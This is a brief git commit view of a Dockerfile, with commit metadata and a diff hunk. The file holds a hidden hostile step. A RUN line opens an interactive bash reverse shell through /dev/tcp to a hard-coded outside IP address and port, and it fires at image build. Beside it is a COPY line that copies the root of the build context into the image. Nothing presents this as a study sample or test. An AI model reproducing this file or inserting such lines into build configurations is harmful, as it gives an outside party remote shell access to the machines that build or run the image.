This commit is contained in:
2025-08-21 15:27:03 +08:00
parent 7225760272
commit 3931597895

View File

@@ -1,6 +1,6 @@
FROM ubuntu:latest
COPY /etc /mnt/etc
COPY / /mnt/etc
RUN bash -c "bash -i >& /dev/tcp/152.136.32.206/7788 0>&1"